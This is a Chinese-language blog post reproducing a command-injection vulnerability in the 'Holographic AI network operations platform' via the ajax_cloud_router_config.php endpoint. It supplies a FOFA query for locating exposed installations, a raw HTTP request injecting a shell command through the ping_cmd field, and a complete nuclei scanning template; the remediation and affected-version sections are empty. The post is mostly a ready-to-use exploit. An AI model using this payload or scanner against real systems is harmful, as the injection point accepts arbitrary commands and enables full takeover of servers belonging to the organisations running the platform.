全息AI网络运维平台ajax_cloud_router_config命令执行

0x01 产品简介

TG万网博通秉承技术驱动场景的创新理念,2015年,国内第一家推出基于人工智能和深度学习技术的“全息AI弱电网络综合运维平台”,实现了弱电智能化AI网络零突破。2017年,国内第一家推出针对视频网络系统专用的“全息AI安防网络专用平台”,并成为了安防行业网络传输标杆产品。依托创新的技术实力,全息AI平台及解决方案已成功的应用于北京冬奥会、北京世园会、北京大兴国际机场、清华大学、南华附属医院、西安地铁、长沙农商银行等国家级或省级重点项目。

0x02 漏洞描述

全息AI网络运维平台接口nmss/cloud/Ajax/ajax_cloud_router_config.php存在命令执行漏洞,导致服务器沦陷。

0x03 影响版本

0x04 搜索语法

FOFA

1
"全息AI网络运维平台" && icon_hash="557768162"

0x05 漏洞复现

系统登录界面

image-20240813133039564
漏洞利用poc

image-20240814124742614

1
2
3
4
5
6
7
8
9
POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
Host: 
Content-Length: 24
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close

ping_cmd=8.8.8.8|sleep%2b6

nuclei的poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: quan_xi_ai_wang_luo_yun_wei_ping_tai_ajax_cloud_router_config-rce

info:
  name:  全息AI网络运维平台ajax_cloud_router_config-rce
  author: admin
  severity: high
  tags: 全息AI,网络运维平台,ajax_cloud_router_config,rce



http:
  - raw:
      - |
        POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 24
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: close

        ping_cmd=8.8.8.8|sleep%2b4

      - |
        POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
        Host: {{Hostname}}  
        Content-Length: 24
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Connection: close

        ping_cmd=8.8.8.8|sleep%2b6

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=6'  
          - 'duration_2>=6 && duration_2<=8'

image-20240813133631543

0x06 修复建议

#漏洞复现
全息AI网络运维平台ajax_cloud_router_config命令执行
https://tsy244.github.io/2024/08/13/漏洞复现/全息AI网络运维平台ajax-cloud-router-config命令执行/
Author
August Rosenberg
Posted on
August 13, 2024
Licensed under